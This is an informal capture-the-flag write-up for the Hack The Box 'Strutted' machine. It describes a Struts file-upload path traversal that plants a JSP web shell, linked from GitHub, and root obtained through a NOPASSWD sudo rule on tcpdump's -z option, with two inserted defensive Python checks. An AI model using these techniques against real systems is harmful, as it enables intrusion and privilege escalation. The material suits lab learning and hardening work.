Strutted-HTB MACHINE


RECON
RUST SCAN && NMAP
rustscan -a 10.10.11.59 --ulimit=5000 --range 1-65000 -- -sCV -Pn

nmap -sC -sV -vv -oA 1 10.10.11.59

RECON && ANALYSIS OF THE WEBSITE !!!
I was just roaming around the website reading the source code when I saw download.action (reading towards the bottom of the page there is something written about their Docker stuff that caught my attention, and then it says to download it and have a look) and upload.action .........
I downloaded the strutted folder and found a directory called strutted with some files in it.

I visited all the files, as you can see below, and got some creds (happy at the time ;)). After that I got the version of Struts 2.


Under pom.xml I saw the version is present. After this I was still checking files: strutted > src > main > java > org > strutted > htb ;) and had a nice read of those files (some database files, but nothing interesting there at all).

I was also looking for some hidden endpoints......

These are some of the files I had a read of (still working on that version, but I was doing it in parallel) ....



RECON OF THE VERSION NUMBER AND UPLOADING AN IMAGE TO GET A FOOTHOLD !!
Finally, after scanning the files, I went through many searches and seriously visited many links, Rapid7 included (but the version was low, around 2 to 2.45 something approx) ..............


After searching for a particular CVE I got some results, and this was quite nice, as I had a nice read of the code: basically what it is doing and all that stuff .........
THEN I STARTED TO ANALYZE THE REQUEST FROM THE PROXY, AS I WAS NOT GETTING THIS POST IMAGE UPLOAD REQUEST DIRECTLY FROM INTERCEPT !!!!!!!...........

I worked out that the form field name is not 'upload' but 'Upload'. If you try this and add a JSP shell as below, the foothold is yours ;). The reason uploading the PNG was a bit difficult is that the PNG content was encoded: I had uploaded a PNG image from the internet, so I was getting a lot of encoded strings ......
Note there are two Content-Disposition fields. After the upload was successful I just added it again at the end to make sure my file lands in the normal directory where I wouldn't get errors !!!,
For example, https://ip/uploads/date_data/filename --> https://ip/file
So putting ../../file in the filename --> ip/file makes it visible (you have to test this; I will be telling you all the failures at the end of this !!!!!!!........
THE CODE AND JSP FILE AT THE END OF THIS SECTION !!!!
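From the defender's side, the two weaknesses used above are a client-supplied filename joined straight onto the dated upload directory (so ../../file climbs out of it) and an upload handler that accepts whatever is sent as an "image". The following is an added example, not code from the machine or from the Struts application: a small Python check showing the vulnerable join next to a hardened version that keeps only the last path component, allowlists image extensions, verifies the file's magic bytes and confirms the final path is still under the upload root. The upload root, date directory and function names are constructed for illustration.

```python
import os
import re

# Added example (not the application's code). Server-chosen policy: which image
# types are allowed and what their first bytes must look like.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
MAGIC_BY_EXT = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# First character may not be a dot (no hidden files, no ".."), no slashes,
# spaces or NUL bytes anywhere, at most 100 characters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-][A-Za-z0-9._-]{0,99}$")


def vulnerable_target_path(upload_root, date_dir, client_filename):
    """The pattern this writeup abuses: the filename taken from the multipart
    Content-Disposition header is joined to uploads/<date>/ as-is, so a value
    like '../../cmd.jsp' normalises to a file in the webroot."""
    return os.path.normpath(os.path.join(upload_root, date_dir, client_filename))


def hardened_target_path(upload_root, date_dir, client_filename, content):
    """Return (path, "ok") for an acceptable upload, or (None, reason) to reject it."""
    # 1. Keep only the last path component (both / and \ separators) and
    #    insist on a conservative character set.
    name = os.path.basename(client_filename.replace("\\", "/"))
    if not SAFE_NAME.match(name):
        return None, "filename contains disallowed characters"
    # 2. Extension allowlist decided by the server, never by the client's Content-Type.
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None, "extension not allowed"
    # 3. The bytes must start like the image type the name claims, so a JSP
    #    renamed to .png is refused even though the extension passed.
    if not content.startswith(MAGIC_BY_EXT[ext]):
        return None, "content does not match extension"
    # 4. Canonicalise and confirm the result is still inside the upload root
    #    (in production also resolve symlinks on the real filesystem).
    root = os.path.normpath(os.path.abspath(upload_root))
    target = os.path.normpath(os.path.join(root, date_dir, name))
    if os.path.commonpath([root, target]) != root:
        return None, "path escapes upload root"
    return target, "ok"


if __name__ == "__main__":
    root, day = "/var/www/app/uploads", "2025-01-01"   # constructed values
    print("vulnerable :", vulnerable_target_path(root, day, "../../cmd.jsp"))
    print("hardened   :", hardened_target_path(root, day, "../../cmd.jsp", b"<% %>"))
    print("renamed jsp:", hardened_target_path(root, day, "shell.jsp.png", b"<%@ page %>"))
    print("real png   :", hardened_target_path(root, day, "cat.png", MAGIC_BY_EXT[".png"][0] + b"\x00" * 16))
```

The vulnerable function turns ../../cmd.jsp into /var/www/app/cmd.jsp, exactly the uploads/date/filename --> /file move described above; the hardened one rejects it on the extension before the path is even built, and rejects a JSP renamed to .png on the magic-byte check. The path check in step 4 is the backstop in case a later change loosens the filename rules.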


I got a shell there !!!!!! (unix) --> foothold


https://raw.githubusercontent.com/tennc/webshell/refs/heads/master/fuzzdb-webshell/jsp/cmd.jsp

GAINING FOOTHOLD && SSH to james ;)
Uploading the file from my terminal to the unix web shell,


Made some mistakes, like uploading it directly; normally I upload it to /tmp.

Sent perfectly !!!!


One more mistake: normally I use port 4444. After a lot of failed attempts, idk, nothing, but at last it worked.

Had some basic recon on the foothold !!!


Saw the user james down below !!!!!

Nothing nice here !!!


Hehehe, we got some creds here,



cat user.txt
And user is yours !!!!


ROOT............
/usr/sbin/tcpdump NOPASSWD
tcpdump = network packet sniffer
tcpdump -z --> captures the packets, rotates the capture file and executes the given command
So basically: captured file >>> rotate it and then exec the cmd !!!......
And there is also a tcpdump page on GTFOBins

Tried to get some help here on Google and got it in my head that this was not going to work (I was doing some other experiments)



Finally the GTFOBins one was the working one and I got root there !!!!!!!
Sudo misconfiguration + tcpdump -z flag + root context = command injection → SUID bash copy → permanent root shell!!!
I am really improving myself at writing reports as I am not an expert, just learning daily. The screenshots above were saved and I have to arrange them properly at the end of the machine, which is tough; I have to do it in parallel. Btw, I did some in parallel at the start ........ will be improving (I'm too lazy!)..
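The root cause here is the sudo rule, not tcpdump itself: NOPASSWD on a binary whose ordinary options (-z) hand the caller a command execution as root. As an added example that is not part of the machine or of any real tool, the Python below parses sudoers-style user specifications and flags exactly that combination, so an admin can catch it before a GTFOBins lookup does. The sudoers lines are constructed, the list of exec-capable binaries is deliberately limited to the one on this page, and the function names are mine.

```python
import re

# Constructed sample lines in sudoers syntax; not the real box's configuration.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
james   ALL=(ALL) NOPASSWD: /usr/sbin/tcpdump
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
ops     ALL=(ALL) /usr/bin/apt update, /usr/bin/apt upgrade
"""

# Binaries whose documented options execute a caller-chosen command.
# tcpdump is the one discussed on this page: -z runs a post-rotate command on
# every rotated capture file, as the user tcpdump runs as (root under sudo).
EXEC_CAPABLE = {
    "tcpdump": "-z <command> is executed for each rotated capture file",
}

# user  host=(runas) [TAG: ...] command[, command ...]
RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$")


def parse_rules(text):
    """Return (user, runas, tags, [commands]) for each user specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        spec, tags = m.group("spec").strip(), set()
        # Tags such as NOPASSWD: or SETENV: sit in front of the command list.
        while True:
            head, sep, rest = spec.partition(":")
            if sep and re.fullmatch(r"[A-Z]+", head.strip()):
                tags.add(head.strip())
                spec = rest.strip()
            else:
                break
        commands = [c.strip() for c in spec.split(",") if c.strip()]
        rules.append((m.group("user"), m.group("runas") or "root", tags, commands))
    return rules


def audit_sudoers(text):
    """Findings: password-less rules that grant ALL or an exec-capable binary
    with no argument restriction (a bare path lets the user pass any flags)."""
    findings = []
    for user, runas, tags, commands in parse_rules(text):
        if "NOPASSWD" not in tags:
            continue
        for cmd in commands:
            parts = cmd.split()
            binary = parts[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append({"user": user, "binary": "ALL", "runas": runas,
                                 "why": "unrestricted sudo without a password"})
            elif binary in EXEC_CAPABLE and len(parts) == 1:
                findings.append({"user": user, "binary": binary, "runas": runas,
                                 "why": EXEC_CAPABLE[binary]})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']} -> {f['binary']} as {f['runas']}: {f['why']}")
```

On the sample the deploy rule is not reported, because systemctl with a fixed argument list is not in the exec-capable set, while james' bare /usr/sbin/tcpdump is. The fix on the defending side is the same thing the check looks for: either require the password, or pin the permitted tcpdump arguments in the rule so -z cannot be added (keeping in mind that sudo's argument matching has its own pitfalls and a dedicated capture account or capability is cleaner than root).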


